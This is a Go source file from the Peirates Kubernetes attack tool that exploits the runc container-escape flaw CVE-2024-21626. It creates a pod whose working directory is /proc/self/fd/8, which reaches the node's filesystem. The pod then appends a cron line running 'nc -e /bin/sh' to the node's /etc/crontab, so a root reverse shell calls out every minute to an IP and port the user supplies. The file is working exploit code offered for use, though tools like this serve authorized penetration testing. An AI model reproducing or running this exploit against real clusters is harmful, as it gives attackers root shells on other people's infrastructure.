-
Notifications
You must be signed in to change notification settings - Fork 121
/
cve-2024-21626.go
101 lines (86 loc) · 2.93 KB
/
cve-2024-21626.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
package peirates
import (
"errors"
"fmt"
"io"
"os"
)
// createLeakyVesselPod() creates a pod to exploit CVE-2024-21626
func createLeakyVesselPod(connectionString ServerInfo) error {
if !kubectlAuthCanI(connectionString, "create", "pods") {
println("[-] Permission Denied: your service account isn't allowed to create pods")
return errors.New("Service account not allow to create pods")
}
// Explain what to expect.
println(`
Provided you are permitted to create pods, Peirates can create a pod that
exploits CVE-2024-21626. This vulnerability (Leaky Vessels) allows you access
to the node's filesystem.
In the current Peirates version, this allows you to add a line to the
node's /etc/crontab file to run a netcat reverse shell. Future versions will
allow other options.
`)
// Before presenting all IP addresses, give the user the IP address for eth0 if available.
eth0IP, err := GetMyIPAddress("eth0")
if err != nil {
fmt.Println("IP address for eth0 is ", eth0IP)
}
println("Your IP addresses: ")
GetMyIPAddressesNative()
println("What IP and Port will your netcat listener be listening on?")
var ip, port string
println("IP:")
_, err = fmt.Scanln(&ip)
println("Port:")
_, err = fmt.Scanln(&port)
// Create a manifest file in the /tmp directory
manifestTmpFile, err := os.CreateTemp("/tmp", "manifest-cve-2024-21626-*.yaml")
if err != nil {
fmt.Println("Failed to create manifest file:", err)
return fmt.Errorf("Failed to create manifest file: %w", err)
}
manifestTmpFilePath := manifestTmpFile.Name()
fmt.Println("DEBUG: created manifest file:", manifestTmpFilePath)
// close and delete the manifest file when we're done.
defer func() {
manifestTmpFile.Close()
os.Remove(manifestTmpFilePath)
}()
// Create a pod manifest in a string.
randString := randSeq(6)
podName := "cve-2024-21626-" + randString
command := fmt.Sprintf("echo \"* * * * * root nc -e /bin/sh %s %s\" >> ../../../../etc/crontab", ip, port)
workingDir := "/proc/self/fd/8"
image := "alpine:latest"
manifestContents := fmt.Sprintf(`---
apiVersion: v1
kind: Pod
metadata:
name: %s
spec:
containers:
- command:
- /bin/sh
- -c
- %s
image: %s
name: %s
workingDir: %s
restartPolicy: Never
...`, podName, command, image, podName, workingDir)
// Write the manifest file
_, err = io.WriteString(manifestTmpFile, manifestContents)
if err != nil {
fmt.Println("Failed to write to manifest file:", err)
return fmt.Errorf("Failed to write to manifest file: %w", err)
}
manifestTmpFile.Close()
// Create the pod
_, _, err = runKubectlSimple(connectionString, "create", "-f", manifestTmpFilePath)
if err != nil {
fmt.Printf("[-] Error while creating hostile pod: %s\n", err.Error())
return fmt.Errorf("Error while creating hostile pod: %w", err)
}
fmt.Printf("Pod %s created - if this works, it will write a netcat reverse shell into its node's /etc/crontab to run every minute.\n\n", podName)
return nil
}